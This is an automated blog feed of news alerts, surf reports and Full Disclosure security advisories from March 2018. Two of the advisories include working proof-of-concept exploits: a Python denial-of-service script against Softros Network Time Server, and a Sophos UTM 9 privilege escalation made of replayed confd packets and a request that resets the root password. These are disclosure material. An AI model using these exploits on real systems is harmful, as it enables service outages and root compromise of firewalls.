Surf: head high to 2 ft overhead
Maximum: 2.142m (7.03ft)
Minimum: 1.53m (5.02ft)

Maryland-Delaware Summary


from Surfline http://ift.tt/1kVmigH
via IFTTT

Anonymous woman to donate roughly $250000 of $559 million Powerball winnings to charities ...

Anonymous woman to donate roughly $250000 of $559 million Powerball winnings to charities, lawyers say.

from Google Alert - anonymous http://ift.tt/2FmvCNN
via IFTTT

Anonymous Powerball Winner's Lawyers Announce Donation

Stream the WBZ NewsRadio 1030 - News Audio episode, Anonymous Powerball Winner's Lawyers Announce Donation, free & on demand on iHeartRadio.

from Google Alert - anonymous http://ift.tt/2DasUF5
via IFTTT

China Duke Kunshan University|Medical Physics

Time sort ascending · Referrer · User, Operations. 03/07/2018 - 18:21, node/4693/track, Anonymous, details. 03/07/2018 - 18:21, node/4693/track, Anonymous, details. 03/07/2018 - 18:20, node/4693/track, Anonymous, details. 03/06/2018 - 13:34, node/4693/track, Anonymous, details. 03/06/2018 - 06:56 ...

from Google Alert - anonymous http://ift.tt/2Fmvz4z
via IFTTT

Anonymous Donors Challenge Eagle Nation to Support Athletics' Endowments

The family, who wishes to remain anonymous, has challenged all of Eagle Nation to contribute to the sustainability of the Foundation and will match up to $750,000 in gifts made to the Coaches Continuity Fund or scholarship endowments that support Georgia Southern student-athletes who play in one ...

from Google Alert - anonymous http://ift.tt/2FlTnS9
via IFTTT

8th St.'s surf is Good

March 06, 2018 at 07:00PM, the surf is Good!

8th St. Summary


Surf: head high to 2 ft overhead
Maximum: 2.142m (7.03ft)
Minimum: 1.53m (5.02ft)

Maryland-Delaware Summary


from Surfline http://ift.tt/1kVmigH
via IFTTT

Memcached DDoS Exploit Code and List of 17,000 Vulnerable Servers Released

Someone has just released proof-of-concept (PoC) exploit code for amplification attack and a pre-compiled list of nearly 17,000 potential vulnerable Memcached servers on the Internet that could even allow script-kiddies to launch massive DDoS attacks using UDP reflections easily. Last week we saw two record-breaking DDoS attacks—1.35 Tbps hit Github and 1.7 Tbps attack against an unnamed


from The Hacker News http://ift.tt/2oOzGfw
via IFTTT

ISS Daily Summary Report – 3/06/2018

Airway Monitoring:  In support of the European Space Agency (ESA) Airway Monitoring investigation, today the crew set up hardware in the US Laboratory for nitric oxide measurements to be taken tomorrow. Airway Monitoring aims to determine the pulmonary nitric oxide turnover in weightlessness and in combined weightless, hypobaric and hypoxic environments as well as determining … Continue reading "ISS Daily Summary Report – 3/06/2018"

from ISS On-Orbit Status Report http://ift.tt/2G3tQOQ
via IFTTT

Predictions for every team's top free agent: Will Ravens re-sign C Ryan Jensen? (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Would Ravens shock everyone (including owner) and draft Baker Mayfield? - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Fly Me Away
Drone enthusiast. 26. Aerial photographer and lover of life.
Asheville, NC

Following: 1798 - Followers: 2302

March 07, 2018 at 05:59AM via Twitter http://twitter.com/KingQuadcopter

Leaked NSA Dump Also Contains Tools Agency Used to Track Other Hackers

A year ago, when the mysterious hacking group 'The Shadow Brokers' dumped a massive trove of sensitive data stolen from the US intelligence agency NSA, everyone started looking for secret hacking tools and zero-day exploits. A group of Hungarian security researchers from CrySyS Lab and Ukatemi has now revealed that the NSA dump doesn't just contain zero-day exploits used to take control of


from The Hacker News http://ift.tt/2FvZGWr
via IFTTT

anonymous galaxy



from Google Alert - anonymous http://ift.tt/2Fz0JF6
via IFTTT

Finding Approximate Location of Anonymous Poster

Answered: Hi, an anonymous poster recently gave a bad review of my local pub. The Landlord thinks this review was posted by me and is giving me grief. The poster was showing as a mobile user. Is there any way that their approximate location when the post was...

from Google Alert - anonymous http://ift.tt/2HaQ3de
via IFTTT

Arcs, Jets, and Shocks near NGC 1999


This tantalizing array of nebulas and stars can be found about two degrees south of the famous star-forming Orion Nebula. The region abounds with energetic young stars producing jets and outflows that push through the surrounding material at speeds of hundreds of kilometers per second. The interaction creates luminous shock waves known as Herbig-Haro (HH) objects. For example, the graceful, flowing arc just right of center is cataloged as HH 222, also called the Waterfall Nebula. Seen below the Waterfall, HH 401 has a distinctive cone shape. The bright bluish nebula below and left of center is NGC 1999, a dusty cloud reflecting light from an embedded variable star. The entire cosmic vista spans over 30 light-years, near the edge of the Orion Molecular Cloud Complex some 1,500 light-years distant. via NASA http://ift.tt/2oPtLHf

Tuesday, March 6, 2018

The Taxes page is accessible over the web by anonymous

Under permissions, only admin can access taxes. - The taxes page at admin/commerce/reports/tax is available to anonymous users (rendered in the non-admin site theme rather than the admin theme).

from Google Alert - anonymous http://ift.tt/2HaZYPL
via IFTTT

anonymous galaxy



from Google Alert - anonymous http://ift.tt/2oTkSeX
via IFTTT

Survey Monkey Anonymous Form

Submit Questions Anonymously.

from Google Alert - anonymous http://ift.tt/2IatVkw
via IFTTT

Anonymous - FOH & BOH Positions

Anonymous – FOH & BOH Positions. Posted on March 06, 2018. Opening in May! New year round Nantucket Restaurant looking to fill most BOH and FOH positions. Seasonal or year round employment available. Looking for fun and creative people to join their team as they take on their first Nantucket ...

from Google Alert - anonymous http://ift.tt/2Fnp1Pm
via IFTTT

[FD] CVE-2017-12544 XSS on HPE System Management Homepage v7.6.0.11 and minor

[FD] DSA-2018-011: RSA Identity Governance and Lifecycle Privilege Escalation Vulnerability



Source: Gmail -> IFTTT-> Blogger

[FD] DSA-2018-038: RSA Archer GRC Platform Multiple Vulnerabilities


Source: Gmail -> IFTTT-> Blogger

[FD] Rapid Scada - 5.5.0 - Insecure Permissions

=====[ Tempest Security Intelligence - ADV-21/2018 ]===
Rapid Scada - 5.5.0 - Insecure Permissions

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode Security Advisory: Magento Stored Cross-Site Scripting – Product Attributes

DefenseCode Security Advisory
Magento Stored Cross-Site Scripting – Product Attributes

Advisory ID: DC-2018-03-004
Advisory Title: Magento Stored Cross-Site Scripting – Product Attributes
Advisory URL: http://ift.tt/2rhPqdW
Software: Magento
Version: Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, Magento 2.2 prior to 2.2.3
Vendor Status: Vendor contacted, vulnerability fixed
Release Date: 06/03/2018
Risk: MEDIUM

1. General Overview
===================
During the security audit of Magento Open Source 2 a stored cross-site scripting vulnerability was discovered that could lead to administrator account takeover by a lower privileged administrator, putting the website customers and their payment information at risk.

2. Software Overview
====================
Magento is an ecommerce platform built on open source technology which provides online merchants with a flexible shopping cart system, as well as control over the look, content and functionality of their online store. Magento offers powerful marketing, search engine optimization, and catalog-management tools. It is a leading enterprise-class eCommerce platform, empowering over 200,000 online retailers.
Homepage: http://www.magento.com

3. Vulnerability Description
============================
During the security analysis of Magento Open Source 2 it was discovered that there is a stored cross-site scripting vulnerability present when an attribute value is set to a malicious JavaScript payload and added to a product. The payload will execute whenever a product is opened for editing, allowing a lower privileged admin with access to products and attributes to attack a higher privileged admin.

4. Solution
===========
Vendor fixed the reported security issues and released a new version. All users are strongly advised to update to the latest available version.

5. Credits
==========
Discovered by Bosko Stankovic (bosko@defensecode.com).

6. Disclosure Timeline
======================
22/11/2017 Vendor contacted through Bugcrowd platform
27/11/2017 Vendor responded
28/02/2018 Vulnerability fixed
06/03/2018 Advisory released

7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://ift.tt/Vn2J4r .
E-mail: defensecode[at]defensecode.com
Website: http://ift.tt/Vn2J4r
Twitter: https://twitter.com/DefenseCode/

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode Security Advisory: Magento Stored Cross-Site Scripting – Downloadable Products

DefenseCode Security Advisory
Magento Stored Cross-Site Scripting – Downloadable Products

Advisory ID: DC-2018-03-003
Advisory Title: Magento Stored Cross-Site Scripting – Downloadable Products
Advisory URL: http://ift.tt/2rhPqdW
Software: Magento
Version: Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, Magento 2.2 prior to 2.2.3
Vendor Status: Vendor contacted, vulnerability fixed
Release Date: 06/03/2018
Risk: MEDIUM

1. General Overview
===================
During the security audit of Magento Open Source 2 a stored cross-site scripting vulnerability was discovered that could lead to administrator account takeover by a lower privileged administrator, putting the website customers and their payment information at risk.

2. Software Overview
====================
Magento is an ecommerce platform built on open source technology which provides online merchants with a flexible shopping cart system, as well as control over the look, content and functionality of their online store. Magento offers powerful marketing, search engine optimization, and catalog-management tools. It is a leading enterprise-class eCommerce platform, empowering over 200,000 online retailers.
Homepage: http://www.magento.com

3. Vulnerability Description
============================
During the security analysis of Magento Open Source 2 it was discovered that a lower privileged admin with access to Products editing can upload a file for a downloadable product using a random extension (ex. .aaa). Extensions like .html or .php are disallowed but if the content of the file is HTML the application will serve the file as such as there is no content disposition header set to force the download. The attacker can then use the link by enticing the higher privileged admin to open it. Unlike a typical XSS which is often limited by length and payload type, this gives an attacker a whole HTML file to work with.

4. Solution
===========
Vendor fixed the reported security issues and released a new version. All users are strongly advised to update to the latest available version.

5. Credits
==========
Discovered by Bosko Stankovic (bosko@defensecode.com).

6. Disclosure Timeline
======================
10/11/2017 Vendor contacted through Bugcrowd platform
15/11/2017 Vendor responded
28/02/2018 Vulnerability fixed
06/03/2018 Advisory released

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode Security Advisory: Magento Multiple Stored Cross-Site Scripting Vulnerabilities

DefenseCode Security Advisory
Magento Multiple Stored Cross-Site Scripting Vulnerabilities

Advisory ID: DC-2018-03-002
Advisory Title: Magento Multiple Stored Cross-Site Scripting Vulnerabilities
Advisory URL: http://ift.tt/2rhPqdW
Software: Magento
Version: Magento 2.0 prior to 2.0.18
Vendor Status: Vendor contacted, vulnerability fixed
Release Date: 06/03/2018
Risk: MEDIUM

1. General Overview
===================
During the security audit of Magento Open Source 2 multiple medium risk stored cross-site scripting vulnerabilities were discovered that could lead to administrator account takeover, putting the website customers and their payment information at risk.

2. Software Overview
====================
Magento is an ecommerce platform built on open source technology which provides online merchants with a flexible shopping cart system, as well as control over the look, content and functionality of their online store. Magento offers powerful marketing, search engine optimization, and catalog-management tools. It is a leading enterprise-class eCommerce platform, empowering over 200,000 online retailers.
Homepage: http://www.magento.com

3. Vulnerability Description
============================
During the security analysis of Magento Open Source 2 prior to 2.0.18 it was discovered that the application returns unescaped and unsanitized user/customer controlled input on direct requests to several application URLs.

User/customer controlled information such as customer first and last name, street address, city, company, shipping and billing information is unsanitized and unescaped in the output resulting from a direct request to the following URL:
http://ift.tt/2oQEOyW

User/customer first and last name information is unsanitized and unescaped in the output resulting from a direct request to the following URLs:
http://ift.tt/2I95ovR
http://ift.tt/2oS8bRo
http://ift.tt/2I7uhIk

The application will return a text/html response with json-formatted content. All aforementioned user-controlled input is prone to stored cross-site scripting.

The prerequisite for this attack is that the Add Secret Key to URLs option is disabled. Secret keys are an additional anti-CSRF measure in Magento, with form keys being the primary measure (that can not be disabled). In a team setting this option is often disabled in order to be able to pass admin links to colleagues, tickets, chat, etc.

4. Solution
===========
Vendor fixed the reported security issues and released a new version. All users are strongly advised to update to the latest available version.

5. Credits
==========
Discovered by Bosko Stankovic (bosko@defensecode.com).

6. Disclosure Timeline
======================
19/04/2017 Vendor contacted through Bugcrowd platform
19/04/2017 Vendor responded
28/02/2018 Vulnerability fixed
06/03/2018 Advisory released

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode Security Advisory: Magento Backups Cross-Site Request Forgery

DefenseCode Security Advisory
Magento Backups Cross-Site Request Forgery

Advisory ID: DC-2018-03-001
Advisory Title: Magento Backups Cross-Site Request Forgery
Advisory URL: http://ift.tt/2rhPqdW
Software: Magento
Version: Magento Open Source prior to 1.9.3.8, Magento Commerce prior to 1.14.3.8, Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, Magento 2.2 prior to 2.2.3
Vendor Status: Vendor contacted, vulnerability fixed
Release Date: 06/03/2018
Risk: MEDIUM

1. General Overview
===================
During the security audit of Magento Open Source 1 and 2 a vulnerability was discovered that could allow an attacker to force an authenticated admin to perform backups and put the store into maintenance mode during backups, which could serve as a denial of service attack vector.

2. Software Overview
====================
Magento is an ecommerce platform built on open source technology which provides online merchants with a flexible shopping cart system, as well as control over the look, content and functionality of their online store. Magento offers powerful marketing, search engine optimization, and catalog-management tools. It is a leading enterprise-class eCommerce platform, empowering over 200,000 online retailers.
Homepage: http://www.magento.com

3. Vulnerability Description
============================
During the security analysis of Magento 2 and 1 a Cross-Site Request Forgery (CSRF) vulnerability was discovered that could allow an attacker to force an authenticated admin to perform backups and put the store into maintenance mode during backups, which could potentially serve as a denial of service attack vector. When a backup HTTP request is changed from POST to GET, the lack of the form_key parameter which serves as a CSRF token is completely ignored and thus allows the request to be abused for CSRF attacks.

The following URL is used in the attacks:
Magento 2: http://ift.tt/2FZmPhL
Magento 1: http://ift.tt/2D3NJCl

The prerequisite for this attack is that the Add Secret Key to URLs option is disabled. Secret keys are an additional anti-CSRF measure in Magento, with form keys being the primary measure (that can not be disabled). In a team setting this option is often disabled in order to be able to pass admin links to colleagues, tickets, chat, etc.

4. Solution
===========
Vendor fixed the reported security issues and released a new version. All users are strongly advised to update to the latest available version.

5. Credits
==========
Discovered by Bosko Stankovic (bosko@defensecode.com).

6. Disclosure Timeline
======================
05/11/2017 Vendor contacted through Bugcrowd platform
17/11/2017 Vendor responded
28/02/2018 Vulnerability fixed
06/03/2018 Advisory released

Source: Gmail -> IFTTT-> Blogger
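The method-switch bypass described in the Magento backups advisory above, modelled as an added example that is not Magento's own code: a request guard that validates the form_key only on POST (the flawed pattern) beside one that requires POST and a valid token for any state-changing action regardless of method. Action names, the request shape and the session object are constructed for the example.

```python
# Added example (not Magento's code): models the CSRF weakness from the
# advisory, where switching a backup request from POST to GET skipped the
# form_key check, and shows a guard that is not bypassed that way.
import hmac
import secrets

# Constructed action names standing in for the backup endpoints; they are
# illustrative, not real Magento routes.
STATE_CHANGING_ACTIONS = {"backup/create", "backup/rollback"}


class Session:
    """Minimal admin session holding a per-session CSRF token (form_key)."""

    def __init__(self):
        self.form_key = secrets.token_urlsafe(16)


def form_key_valid(session, request):
    """True if the request carries a form_key equal to the session's token."""
    supplied = request.get("params", {}).get("form_key")
    if supplied is None:
        return False
    # Constant-time comparison so the check does not leak the token by timing.
    return hmac.compare_digest(supplied, session.form_key)


def vulnerable_guard(session, request):
    """Flawed pattern: the token is only validated when the method is POST.

    Any request arriving as GET skips the check entirely, so a forged link
    opened by a logged-in admin triggers the action without a form_key.
    """
    if request["method"] == "POST":
        return form_key_valid(session, request)
    return True


def hardened_guard(session, request):
    """State-changing actions must be POST and must carry a valid form_key.

    Method and token are checked independently of each other, so changing
    the method cannot route around the token requirement.
    """
    if request["action"] not in STATE_CHANGING_ACTIONS:
        return True
    if request["method"] != "POST":
        return False
    return form_key_valid(session, request)


def demo():
    """Run both guards over constructed requests; returns allow/deny results."""
    session = Session()
    requests = {
        # Forged cross-site link: GET, no token at all.
        "forged_get": {"method": "GET", "action": "backup/create", "params": {}},
        # Legitimate admin form submission: POST with the session's token.
        "legit_post": {
            "method": "POST",
            "action": "backup/create",
            "params": {"form_key": session.form_key},
        },
        # POST with a guessed token: both guards must reject it.
        "wrong_key_post": {
            "method": "POST",
            "action": "backup/create",
            "params": {"form_key": "guessed"},
        },
        # Read-only page: no token needed under either guard.
        "report_get": {"method": "GET", "action": "reports/view", "params": {}},
    }
    return {
        name: {
            "vulnerable": vulnerable_guard(session, req),
            "hardened": hardened_guard(session, req),
        }
        for name, req in requests.items()
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:15s} vulnerable={outcome['vulnerable']} hardened={outcome['hardened']}")
```

The forged GET is the only case where the two guards disagree, which is exactly the gap the advisory describes.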

[FD] Softros Network Time System Server v2.3.4 / Denial Of Service CVE-2018-7658

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://ift.tt/2thMJe2
[+] ISR: Apparition Security

Vendor:
=============
www.softros.com
http://ift.tt/2oNvCMG

Product:
===========
Network Time System Server v2.3.4
Both x86/x64 versions

Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment establishing an interconnected time synchronization system for each and every machine and device on the company network.

Vulnerability Type:
===================
Denial Of Service

CVE Reference:
==============
CVE-2018-7658

Security Issue:
================
The Network Time System (Server) "NTSServerSvc" service listens on Port 7001; unauthenticated remote attackers can crash the Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization could then potentially be impacted.

Stack dump:
'''
eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
NTSServerSvc+0x69a5:
004069a5 880a mov byte ptr [edx],cl ds:0023:00000000=??
Resetting default scope

FAULTING_IP:
NTSServerSvc+69a5
004069a5 880a mov byte ptr [edx],cl

EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5)
ExceptionCode: c0000005 (Access violation)
'''

Exploit/POC:
=============
import socket
#Network Time System (Server) NTSServerSvc.exe v2.3.4
#Softros Systems
#NTS Server service for time synchronization over network

print 'Network Time Server 11 byte Denial Of Service'
print 'by hyp3rlinx'

HOST=raw_input('Network Time Server IP')
PORT=7001
payload='A'*11

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(payload)
s.close()

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
=============================
Vendor Notification: February 10, 2018
Second attempt : February 24, 2018
Request CVE, assigned by Mitre : March 3, 2018
March 5, 2018: Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

[FD] KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service

KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service

Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service
Advisory ID: KL-001-2018-007
Publication Date: 2018.03.02
Publication URL: http://ift.tt/2HYyuOt

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: UTM 9
Affected Version: 9.410
Platform: Embedded Linux
CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)
Impact: Privilege Escalation
Attack vector: SSH

2. Vulnerability Description

The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, the running service is accessible over a network port on the loopback interface. By replaying the network traffic required to obtain a SID from this service it is possible to escalate privileges to root.

3. Technical Description

1. Obtain a privileged session token

$ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7
loginuser@1.3.3.7's password:
$ python kl-loginuser-confd-priv_esc.py
pojiZSqWEUAUDNIQtSop

2. Using that session token, set the root password

POST /webadmin.plx HTTP/1.1
Host: 1.3.3.7:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Referer: https://1.3.3.7:4444/
Content-Length: 422
Cookie: SID=pojiZSqWEUAUDNIQtSop
DNT: 1
Connection: close

{"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 15:33:53 GMT
Server: Apache
Expires: Thursday, 01-Jan-1970 00:00:01 GMT
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Content-Type-Option: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 178895

{"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]

3. Look for success message.

"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

4. Profit.

loginuser@[redacted]:/home/login > su
Password:
[redacted]:/home/login # id
uid=0(root) gid=0(root) groups=0(root),890(xorp)

4. Mitigation and Remediation Recommendation

The vendor has addressed this vulnerability in version 9.508. Release notes and download instructions can be found at:
http://ift.tt/2oJHuyk

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2017.07.21 - KoreLogic submits vulnerability details to Sophos.
2017.07.21 - Sophos acknowledges receipt.
2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos.
2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos.
2017.09.18 - Sophos informs KoreLogic that this issue will require additional engineering and requests an extension of the disclosure timeline.
2017.09.25 - 45 business days have elapsed since the vulnerability was reported to Sophos.
2017.11.07 - 75 business days have elapsed since the vulnerability was reported to Sophos.
2017.12.14 - 100 business days have elapsed since the vulnerability was reported to Sophos.
2018.01.12 - KoreLogic requests an update from Sophos.
2018.01.15 - Sophos informs KoreLogic that the expected release date for the UTM 9.5 MR 6 version containing the mitigation is the middle of February.
2018.01.16 - 120 business days have elapsed since the vulnerability was reported to Sophos.
2018.02.28 - 150 business days have elapsed since the vulnerability was reported to Sophos.
2018.03.01 - UTM 9.508 released by Sophos.
2018.03.02 - KoreLogic public disclosure.

7. Proof of Concept

from socket import socket,AF_INET,SOCK_STREAM

class Exploit:
    def __init__(self):
        self.host = '127.0.0.1'
        self.port = 4472
        self.connected = False
        self.s = None
        return None
    def disconnect(self):
        self.s.close()
        return True
    def send_trigger(self):
        packet_one = '00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex')
        self.s.send(packet_one)
        self.s.recv(4096)
        packet_two = '00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex')
        self.s.send(packet_two)
        self.s.recv(4096)
        packet_three = '0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex')
        self.s.send(packet_three)
        print self.s.recv(4096).strip()
        return True
    def connect(self):
        self.s = socket(AF_INET, SOCK_STREAM)
        self.s.connect((self.host,self.port))
        self.connected = True
        return True
    def run(self):
        self.connect()
        self.send_trigger()
        self.disconnect()
        return True

if __name__=="__main__":
    Exploit().run()

The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community.
http://ift.tt/292hO8r

Our public vulnerability disclosure policy is available at:
http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger

Mechanical Turk is Not Anonymous



from Google Alert - anonymous http://ift.tt/2xyLwQ5
via IFTTT

Calvin Ridley at No. 16? Ravens' pipe dream is suddenly a possibility - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/05/2018

Combustion Integrated Rack (CIR) Advanced Combustion via Microgravity Experiments (ACME) Electric-Field Effects on Laminar Diffusion (E-Field) Flames:  The crew replaced the compensator module in the CIR Hi Bit-depth Multi-Spectral (HiBMS) Imaging package today.  This is in preparation for the upcoming ACME E-Field Flames investigation. The ACME investigation is a set of five independent studies of … Continue reading "ISS Daily Summary Report – 3/05/2018"

from ISS On-Orbit Status Report http://ift.tt/2oMy5Xv
via IFTTT

Anonymous Cart Migration to Existing User Cart

Hello. We are using EPiServer CMS 10.10.4 and Commerce 10.8 and have been running into an issue when a user logs into their account with a cart created when logged out. If the user is new or did not have a previous cart with their logged in cart and log in with an anonymous cart, everything seems ...

from Google Alert - anonymous http://ift.tt/2HdBfdH
via IFTTT

Run 'Kali Linux' Natively On Windows 10 — Just Like That!

Great news for hackers. Now you can download and install Kali Linux directly from the Microsoft App Store on Windows 10 just like any other application. I know it sounds crazy, but it's true! Kali Linux, a very popular, free, and open-source Linux-based operating system widely used for hacking and penetration testing, is now natively available on Windows 10, without requiring dual boot or


from The Hacker News http://ift.tt/2oXqdC2
via IFTTT

Territory Manager

New! Fantastic opportunity to join a growing medical company! We're looking for a highly driven sales professional with strong...See this and similar jobs on LinkedIn.

from Google Alert - anonymous http://ift.tt/2oLacjk
via IFTTT

1.7 Tbps DDoS Attack — ​Memcached UDP Reflections Set New Record

The bar has been raised. As more amplified attacks were expected following the record-breaking 1.35 Tbps Github DDoS attack, someone has just set a new record after only four days — a 1.7 Tbps DDoS attack. Network security and monitoring company Arbor Networks claims that its ATLAS global traffic and DDoS threat data system has recorded a 1.7 Tbps reflection/amplification attack against one of


from The Hacker News http://ift.tt/2tjG5UH
via IFTTT

Colorful Airglow Bands Surround Milky Way


Why would the sky glow like a giant repeating rainbow? Airglow. Now air glows all of the time, but it is usually hard to see. A disturbance however -- like an approaching storm -- may cause noticeable rippling in the Earth's atmosphere. These gravity waves are oscillations in air analogous to those created when a rock is thrown in calm water. Red airglow likely originates from OH molecules about 87 kilometers high, excited by ultraviolet light from the Sun, while orange and green airglow is likely caused by sodium and oxygen atoms slightly higher up. While driving near Keluke Lake in Qinghai Province in China, the photographer originally noticed mainly the impressive central band of the Milky Way Galaxy. Stopping to photograph it, surprisingly, the resulting sensitive camera image showed airglow bands to be quite prominent and span the entire sky. The featured image has been digitally enhanced to make the colors more vibrant. via NASA http://ift.tt/2FhJXqI

Monday, March 5, 2018

Contact HP - Anonymous (selected)



from Google Alert - anonymous http://ift.tt/2lSlxvp
via IFTTT

An improved anonymous authentication scheme for roaming in ubiquitous networks

With the evolution of communication technology and the exponential increase of mobile devices, the ubiquitous networking allows people to use our data and computing resources anytime and everywhere. However, numerous security concerns and complicated requirements arise as these ubiquitous ...

from Google Alert - anonymous http://ift.tt/2oRNc1b
via IFTTT

New 4G LTE Network Attacks Let Hackers Spy, Track, Spoof and Spam

Security researchers have discovered a set of severe vulnerabilities in 4G LTE protocol that could be exploited to spy on user phone calls and text messages, send fake emergency alerts, spoof location of the device and even knock devices entirely offline. A new research paper [PDF] recently published by researchers at Purdue University and the University of Iowa details 10 new cyber attacks


from The Hacker News http://ift.tt/2oRi2Xz
via IFTTT

NFL Insiders predict: Why Jimmy Graham will end up with Ravens - Dan Graziano (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/02/2018

Node 3 Major Constituent Analyzer (MCA) Calibration Failure: Yesterday, the crew successfully replaced the N3 MCA Verification Gas Assembly (VGA) as part of regularly scheduled maintenance. During calibration, however, data was off-nominal and the planned full calibration failed to complete.  Teams continue to work a forward plan to restore full N3 MCA functionality. SUPVIS-Justin:  The … Continue reading "ISS Daily Summary Report – 3/02/2018"

from ISS On-Orbit Status Report http://ift.tt/2thSdWf
via IFTTT

600 Powerful Bitcoin-Mining Computers Worth $2 Million Stolen In Iceland

Around 600 powerful devices specifically designed for mining bitcoin and other cryptocurrencies have been stolen from Icelandic data centers in what has been dubbed the "Big Bitcoin Heist." Criminals chasing cryptocurrency profits have so far hacked exchanges, spread mining malware and ransomware, kidnapped cryptocurrency investors for ransom, and tried to rob a bitcoin exchange,


from The Hacker News http://ift.tt/2H6oOR5
via IFTTT

The 7 best deep learning books you should be reading right now

In today’s post I’m going to share with you the 7 best deep learning books (in no particular order) I have come across and would personally recommend you read.

Some of these deep learning books are heavily theoretical, focusing on the mathematics and associated assumptions behind neural networks and deep learning.

Other deep learning books are entirely practical and teach through code rather than theory.

And even other deep learning books straddle the line, giving you a healthy dose of theory while enabling you to “get your hands dirty” and learn by implementing (these tend to be my favorite deep learning books).

For each deep learning book I’ll discuss the core concepts covered, the target audience, and if the book is appropriate for you.

To discover the 7 best books for studying deep learning, just keep reading!

The 7 best deep learning books you should be reading right now

Before you choose a deep learning book, it’s best to assess your own personal learning style to ensure you get the most out of the book.

Start by asking yourself the following question:

